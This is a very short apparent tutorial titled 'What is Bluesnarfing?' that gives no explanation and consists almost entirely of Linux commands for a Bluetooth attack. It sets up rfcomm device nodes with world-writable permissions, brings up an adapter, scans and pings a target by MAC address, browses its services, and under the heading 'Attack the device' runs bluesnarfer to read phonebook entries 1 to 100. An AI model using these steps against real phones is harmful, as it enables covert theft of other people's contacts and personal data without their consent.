What is Bluesnarfing?
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 26 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0
Let’s scan the device:
hciconfig -i hci0 scan
l2ping <MAC>
sdptool browse --tree --l2cap <MAC>
Attack the device:
bluesnarfer -r 1-100 -C 7 -b <MAC>